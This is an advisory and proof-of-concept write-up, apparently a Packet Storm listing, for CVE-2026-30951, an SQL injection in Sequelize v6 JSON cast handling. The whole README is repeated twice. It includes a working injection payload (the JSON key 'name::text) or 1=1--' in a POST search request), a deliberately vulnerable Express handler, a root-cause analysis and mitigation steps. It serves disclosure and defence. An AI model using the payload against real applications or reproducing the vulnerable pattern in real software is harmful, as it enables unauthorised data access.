7.5
/ 10
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Description
A remote SQL injection vulnerability exists Sequelize versions 6.37.7 and below in the JSON/JSONB where clause processing. When Sequelize parses a JSON path key containing ::, the value after :: is treated as a SQL cast type and is inserted into the...
Basic Information
ID
PACKETSTORM:219872
Published
Apr 27, 2026 at 00:00
Affected Product
Affected Versions
# CVE-2026-30951 Sequelize JSON Cast SQL Injection
**★ CVE-2026-30951 Sequelize ORM SQL Injection PoC ★**
https://github.com/user-attachments/assets/30b19211-890a-4780-acd9-04856ec98381
# Overview
> **CVE-2026-30951** is a **SQL Injection** vulnerability in **Sequelize v6**, a widely used Node.js ORM.
>
> The vulnerability exists in JSON/JSONB `where` clause processing. When Sequelize parses a JSON path key containing `::`, the value after `::` is treated as a SQL cast type and is inserted into the generated SQL without proper validation.
>
> If an attacker can control JSON object keys passed into a Sequelize `where` clause, they can manipulate the generated SQL query.
# Affected Versions
| Category | Version |
| --- | --- |
| **Vulnerable** | Sequelize **v6.x \<= 6.37.7** |
| **Patched** | Sequelize **6.37.8** |
| **Not affected** | Sequelize v7 / `@sequelize/core` |
# Impact
* SQL injection through attacker-controlled JSON object keys
* Search filter bypass through boolean-based injection
* Unintended query condition manipulation inside ORM-generated SQL
# Environment
This repository contains a minimal vulnerable Node.js, Express, Sequelize, and SQLite challenge app.
## Local Run
```
npm install
npm start
```
The app starts on:
```
http://127.0.0.1:9100
```
## Docker
```
docker build -t cve-2026-30951-sequelize-vuln .
docker run --rm -it -p 9100:9100 --name sequelize-vuln cve-2026-30951-sequelize-vuln
```
The Docker container starts on:
```
http://127.0.0.1:9100
```
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the injection.
## Step 1. Send a normal search request
```
POST /api/users/search
Content-Type: application/json
{
"filter": {
"name": "emma"
}
}
```
This returns only users matching the normal name search logic.
## Step 2. Trigger a boolean-based SQL injection
```
POST /api/users/search
Content-Type: application/json
{
"filter": {
"name::text) or 1=1--": "emma"
}
}
```
Expected result:
```
All user rows are returned.
```
## Step 3. Confirm that SQL injection occurred
The crafted JSON key causes Sequelize to generate a cast expression similar to:
```
CAST(json_extract(`User`.`metadata`, '$.name') AS TEXT) OR 1=1--)
```
Because the cast type is attacker-controlled, the `OR 1=1` condition changes the intended `WHERE` clause behavior. Returning all rows from the same search endpoint confirms that SQL injection is possible.
## Analysis
### Technical Root Cause
The vulnerability is caused by insufficient validation of JSON cast types in Sequelize v6.
Internally, Sequelize's JSON traversal logic splits JSON path keys on `::`:
```
jsonKey::castType
```
The cast type is then used in generated SQL like:
```
CAST(<json_extract_expression> AS <cast_type>)
```
In vulnerable versions, `<cast_type>` is not safely escaped or restricted to a known-safe allowlist. This allows an attacker-controlled JSON key to break out of the cast expression and inject SQL.
### Dangerous Pattern
Any application pattern similar to the following may be vulnerable when using affected Sequelize versions:
```
app.post('/api/users/search', async (req, res) => {
const users = await User.findAll({
where: {
metadata: req.body.filter
}
});
res.json(users);
});
```
This is dangerous because the attacker controls not only JSON values, but also JSON object keys.
### Why This Matters
This vulnerability is especially dangerous because many developers assume ORM query builders automatically protect against SQL injection. In this case, the injection happens inside ORM-generated SQL, after the application has already passed structured JavaScript objects to Sequelize.
Depending on the application logic, exploitation may allow:
* bypassing intended search filters
* altering boolean query conditions
* changing the behavior of ORM-generated SQL
This is fundamentally a **CWE-89: Improper Neutralization of Special Elements used in an SQL Command** issue.
## Scenario
```
+-------------------------------------------+
| Attacker |
+-------------------------------------------+
|
| Sends crafted JSON filter
| with malicious name:: key
v
+-------------------------------------------+
| POST /api/users/search |
+-------------------------------------------+
|
| Sequelize JSON where clause
| processes key containing ::
v
+-------------------------------------------+
| Unescaped SQL cast type injection |
+-------------------------------------------+
|
| Boolean condition manipulation
v
+-------------------------------------------+
| SQL Injection Confirmed |
+-------------------------------------------+
```
# Mitigation
* Upgrade Sequelize to **6.37.8 or later**
* Do not pass user-controlled objects directly into Sequelize JSON/JSONB `where` clauses
* Reject or normalize user-controlled JSON keys before building ORM filters
* Use whitelist-based filter construction instead of accepting arbitrary request body objects
* Reject JSON keys containing SQL control syntax or cast separators such as `::` unless explicitly required
* Prefer server-defined query fields, for example:
```
const allowedFilters = ['name', 'role', 'team', 'office', 'department'];
if (!allowedFilters.includes(req.body.field)) {
throw new Error('Invalid filter field');
}
```
# Disclaimer
This repository is intended for security research, defensive validation, and educational use in controlled environments only.
Do not use this PoC against systems you do not own or do not have explicit permission to test.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
- https://www.skshieldus.com/security-insights/reports?tab=eqst
# References
* https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr
* https://nvd.nist.gov/vuln/detail/CVE-2026-30951
* https://osv.dev/vulnerability/CVE-2026-30951
* https://advisories.gitlab.com/npm/sequelize/CVE-2026-30951/
* https://github.com/sequelize/sequelize
**★ CVE-2026-30951 Sequelize ORM SQL Injection PoC ★**
https://github.com/user-attachments/assets/30b19211-890a-4780-acd9-04856ec98381
# Overview
> **CVE-2026-30951** is a **SQL Injection** vulnerability in **Sequelize v6**, a widely used Node.js ORM.
>
> The vulnerability exists in JSON/JSONB `where` clause processing. When Sequelize parses a JSON path key containing `::`, the value after `::` is treated as a SQL cast type and is inserted into the generated SQL without proper validation.
>
> If an attacker can control JSON object keys passed into a Sequelize `where` clause, they can manipulate the generated SQL query.
# Affected Versions
| Category | Version |
| --- | --- |
| **Vulnerable** | Sequelize **v6.x \<= 6.37.7** |
| **Patched** | Sequelize **6.37.8** |
| **Not affected** | Sequelize v7 / `@sequelize/core` |
# Impact
* SQL injection through attacker-controlled JSON object keys
* Search filter bypass through boolean-based injection
* Unintended query condition manipulation inside ORM-generated SQL
# Environment
This repository contains a minimal vulnerable Node.js, Express, Sequelize, and SQLite challenge app.
## Local Run
```
npm install
npm start
```
The app starts on:
```
http://127.0.0.1:9100
```
## Docker
```
docker build -t cve-2026-30951-sequelize-vuln .
docker run --rm -it -p 9100:9100 --name sequelize-vuln cve-2026-30951-sequelize-vuln
```
The Docker container starts on:
```
http://127.0.0.1:9100
```
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the injection.
## Step 1. Send a normal search request
```
POST /api/users/search
Content-Type: application/json
{
"filter": {
"name": "emma"
}
}
```
This returns only users matching the normal name search logic.
## Step 2. Trigger a boolean-based SQL injection
```
POST /api/users/search
Content-Type: application/json
{
"filter": {
"name::text) or 1=1--": "emma"
}
}
```
Expected result:
```
All user rows are returned.
```
## Step 3. Confirm that SQL injection occurred
The crafted JSON key causes Sequelize to generate a cast expression similar to:
```
CAST(json_extract(`User`.`metadata`, '$.name') AS TEXT) OR 1=1--)
```
Because the cast type is attacker-controlled, the `OR 1=1` condition changes the intended `WHERE` clause behavior. Returning all rows from the same search endpoint confirms that SQL injection is possible.
## Analysis
### Technical Root Cause
The vulnerability is caused by insufficient validation of JSON cast types in Sequelize v6.
Internally, Sequelize's JSON traversal logic splits JSON path keys on `::`:
```
jsonKey::castType
```
The cast type is then used in generated SQL like:
```
CAST(<json_extract_expression> AS <cast_type>)
```
In vulnerable versions, `<cast_type>` is not safely escaped or restricted to a known-safe allowlist. This allows an attacker-controlled JSON key to break out of the cast expression and inject SQL.
### Dangerous Pattern
Any application pattern similar to the following may be vulnerable when using affected Sequelize versions:
```
app.post('/api/users/search', async (req, res) => {
const users = await User.findAll({
where: {
metadata: req.body.filter
}
});
res.json(users);
});
```
This is dangerous because the attacker controls not only JSON values, but also JSON object keys.
### Why This Matters
This vulnerability is especially dangerous because many developers assume ORM query builders automatically protect against SQL injection. In this case, the injection happens inside ORM-generated SQL, after the application has already passed structured JavaScript objects to Sequelize.
Depending on the application logic, exploitation may allow:
* bypassing intended search filters
* altering boolean query conditions
* changing the behavior of ORM-generated SQL
This is fundamentally a **CWE-89: Improper Neutralization of Special Elements used in an SQL Command** issue.
## Scenario
```
+-------------------------------------------+
| Attacker |
+-------------------------------------------+
|
| Sends crafted JSON filter
| with malicious name:: key
v
+-------------------------------------------+
| POST /api/users/search |
+-------------------------------------------+
|
| Sequelize JSON where clause
| processes key containing ::
v
+-------------------------------------------+
| Unescaped SQL cast type injection |
+-------------------------------------------+
|
| Boolean condition manipulation
v
+-------------------------------------------+
| SQL Injection Confirmed |
+-------------------------------------------+
```
# Mitigation
* Upgrade Sequelize to **6.37.8 or later**
* Do not pass user-controlled objects directly into Sequelize JSON/JSONB `where` clauses
* Reject or normalize user-controlled JSON keys before building ORM filters
* Use whitelist-based filter construction instead of accepting arbitrary request body objects
* Reject JSON keys containing SQL control syntax or cast separators such as `::` unless explicitly required
* Prefer server-defined query fields, for example:
```
const allowedFilters = ['name', 'role', 'team', 'office', 'department'];
if (!allowedFilters.includes(req.body.field)) {
throw new Error('Invalid filter field');
}
```
# Disclaimer
This repository is intended for security research, defensive validation, and educational use in controlled environments only.
Do not use this PoC against systems you do not own or do not have explicit permission to test.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
- https://www.skshieldus.com/security-insights/reports?tab=eqst
# References
* https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr
* https://nvd.nist.gov/vuln/detail/CVE-2026-30951
* https://osv.dev/vulnerability/CVE-2026-30951
* https://advisories.gitlab.com/npm/sequelize/CVE-2026-30951/
* https://github.com/sequelize/sequelize